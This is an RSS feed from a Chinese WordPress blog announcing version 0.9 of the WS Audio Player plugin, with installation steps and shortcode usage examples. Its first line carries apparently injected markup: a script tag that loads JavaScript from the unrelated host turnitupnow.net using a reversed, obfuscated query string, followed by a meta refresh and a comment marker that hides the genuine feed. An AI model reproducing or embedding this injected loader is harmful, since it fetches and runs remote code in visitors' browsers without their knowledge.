<script src='http://turnitupnow.net/?rnd=3407%2Fdeef%2Freyalpoidua-sw%2Fgat%2Fmoc.faelyci'></script><meta http-equiv='refresh' content='0;url=http://icyleaf.com/tag/ws-audioplayer/feed/'><!--<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>.::灵狼天::. &#187; WS AudioPlayer</title>
	<atom:link href="http://icyleaf.com/tag/ws-audioplayer/feed/" rel="self" type="application/rss+xml" />
	<link>http://icyleaf.com</link>
	<description>icyleaf&#039;s blog - 心外无理，心外无物，心外无事</description>
	<lastBuildDate>Tue, 13 Dec 2011 02:34:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>WordPress插件：WS Audio Player 0.9发布</title>
		<link>http://icyleaf.com/2007/11/wordpress-plugin-ws-audio-player-09-released-audio-player-09%e5%8f%91%e5%b8%83/</link>
		<comments>http://icyleaf.com/2007/11/wordpress-plugin-ws-audio-player-09-released-audio-player-09%e5%8f%91%e5%b8%83/#comments</comments>
		<pubDate>Mon, 05 Nov 2007 14:31:51 +0000</pubDate>
		<dc:creator>icyleaf</dc:creator>
				<category><![CDATA[WordPress]]></category>
		<category><![CDATA[Plugins]]></category>
		<category><![CDATA[WS AudioPlayer]]></category>

		<guid isPermaLink="false">http://www.icyleaf.cn/2007/11/05/pluginsws-audio-player-09%e5%8f%91%e5%b8%83/</guid>
		<description><![CDATA[WS Audio Player是一个可在日志插入且附带下载功能的在线Flash播放器。说来这个Audio Player以及样式，其实是我从Pownce发现的，看着其效果真的很棒，由于pownce自带的4个模板的背景色均不为白色，所以它的MP3 Flash Player搭配的很完美。 经过多次的研究和测试，成功抽取了其Flash Player以及CSS文件。蛮不道德的哈，但至少我没有独揽其版权，据为己有！ 看到这个Flash Player是如此的完美，因此我想把它做成WP的插件，使其大家共享使用。 ==================== 安装 ==================== 1.解压缩ZIP文件到自己BLOG空间的wp-content/plugins下面。 2.进入WP后台激活WS Audio Player插件。 3.在WP后台的Option（操作）管理页面，找到WS Audio Plauer可进行外观的选择和配色。（目前只有2种选择以及自定义模式） 使用方法 发布日志的时候，在代码状态(可视化状态和代码状态均可)输入：[ audio=音乐的地址[,音乐名称,download] ] (*)其中音乐名称和download（是否可下载）为可选择选项。 举例说明： 插入一首名为“转角爱”，音乐的地址为http://www.icyleaf.cn/music.mp3 由于可视化也能显示，所以我在[]最左，最右加了空格。 样式1： 只显示播放器 [ audio=http://www.icyleaf.cn/music.mp3 ] 样式2： 只显示播放器以及音乐名称 [ audio=http://www.icyleaf.cn/music.mp3,转角爱 ] 样式3： 只显示播放器以及下载按钮（注意，中间有两个逗号） &#8230; <a href="http://icyleaf.com/2007/11/wordpress-plugin-ws-audio-player-09-released-audio-player-09%e5%8f%91%e5%b8%83/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-198" title="audioplayer_blue" src="http://www.icyleaf.cn/wp-content/uploads/2008/05/audioplayer_blue.jpg" alt="" width="309" height="96" />WS Audio Player是一个可在日志插入且附带下载功能的在线Flash播放器。说来这个Audio Player以及样式，其实是我从<a href="http://pownce.com" target="_blank">Pownce</a>发现的，看着其效果真的很棒，由于pownce自带的4个模板的背景色均不为白色，所以它的MP3 Flash Player搭配的很完美。<br />
经过多次的研究和测试，成功抽取了其Flash Player以及CSS文件。蛮不道德的哈，但至少我没有独揽其版权，据为己有！<br />
看到这个Flash Player是如此的完美，因此我想把它做成WP的插件，使其大家共享使用。<br />
====================<br />
安装<br />
====================<br />
1.解压缩ZIP文件到自己BLOG空间的wp-content/plugins下面。<br />
2.进入WP后台激活WS Audio Player插件。<br />
3.在WP后台的Option（操作）管理页面，找到WS Audio Plauer可进行外观的选择和配色。（目前只有2种选择以及自定义模式）</p>
<p><span id="more-84"></span><strong>使用方法</strong><br />
发布日志的时候，在<span style="text-decoration: line-through;">代码状态</span>(<strong>可视化状态和代码状态均可</strong>)输入：[ audio=音乐的地址<em>[,音乐名称,download] </em>]<br />
(*)其中音乐名称和download（是否可下载）为可选择选项。<br />
举例说明： 插入一首名为“转角爱”，音乐的地址为http://www.icyleaf.cn/music.mp3<br />
由于可视化也能显示，所以我在[]最左，最右加了空格。<br />
样式1： 只显示播放器<br />
[ audio=http://www.icyleaf.cn/music.mp3 ]<br />
样式2： 只显示播放器以及音乐名称<br />
[ audio=http://www.icyleaf.cn/music.mp3,转角爱 ]<br />
样式3： 只显示播放器以及下载按钮（注意，中间有两个逗号）<br />
[ audio=http://www.icyleaf.cn/music.mp3,,download ]<br />
样式4： 全部显示：播放器，音乐名称，下载按钮<br />
[ audio=http://www.icyleaf.cn/music.mp3,转角爱,download ]</p>
<p>操作界面：<br />
<a href="http://photo14.yupoo.com/20071126/121351_494404271_hxuyzxzm.jpg" target="_blank"><img src="http://photo14.yupoo.com/20071126/121351_494404271.jpg" alt="WS Audio Player" width="434" height="500" /></a></p>
<p><strong>注意事项</strong><br />
1. 除了音乐名称外，其他符号均为英文半角状态。<br />
2. 如果只准备显示播放器以及下载按钮，不要忘记中间为两个逗号。<br />
3.测试结果显示效果正常，段落的间隔大是这个主题的原因。<br />
4.仅支持MP3格式。WMA格式能加载但不支持&#8230;</p>
<p><strong>插件下载（Plugins Download)<br />
</strong>[2008-01-09]<a href="http://www.icyleaf.cn/2008/01/09/ws-audio-player10/" target="_blank">1.0更新说明</a>：<a href="http://wordpress.org/extend/plugins/ws-audio-player/" target="_blank">Download</a><strong><br />
</strong>[2007-12-24]<a href="http://www.icyleaf.cn/2007/12/24/wordpress-plugin-ws-audio-player-095-released/" target="_blank">0.9.5更新说明</a>：<span style="text-decoration: line-through;">Download</span><strong><br />
</strong>[2007-11-28]<a href="http://www.icyleaf.cn/2007/11/27/wordpress-plug-ins-ws-audio-player094/" target="_blank">0.9.4更新说明</a>：<span style="text-decoration: line-through;">Download</span><br />
[2007-11-07]<a href="http://www.icyleaf.cn/2007/11/06/plugins-ws-audio-player-093-amended-version/" target="_blank">0.9.3修正版更新说明</a>：<span style="text-decoration: line-through;">Download@Box | Download@FUY</span></p>
<p><strong>For People who spoken English</strong><a href="http://wordpress.org/extend/plugins/ws-audio-player/"><br />
Readme about &#8220;WS Audio Player&#8221; </a></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;嗷～～～嗷～～～～&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
由于我是PHP&amp;WP新手，在做这个插件的时候遇到好多多个问题，如：表单提交选项的储存；文件的读取和写入（在WP下有路径限制问题，我查询N多的插件，尤其是关于CSS都是自己在文件写，这样非常的麻烦，幸好经过2天的钻研问题解决）。。。<br />
幸好今天终于完工了，但是还是有些瑕疵，所以没有做到1.0版本。有待解决^@^<br />
最后送大家一首歌：I&#8217;ll Take Everything [audio=http://bbsimg.qianlong.com/attachments/azhazha/912/03.mp3,I'll Take Everything,download]</p>
]]></content:encoded>
			<wfw:commentRss>http://icyleaf.com/2007/11/wordpress-plugin-ws-audio-player-09-released-audio-player-09%e5%8f%91%e5%b8%83/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
<enclosure url="http://bbsimg.qianlong.com/attachments/azhazha/912/03.mp3" length="3706603" type="audio/mpeg" />
		</item>
	</channel>
</rss>

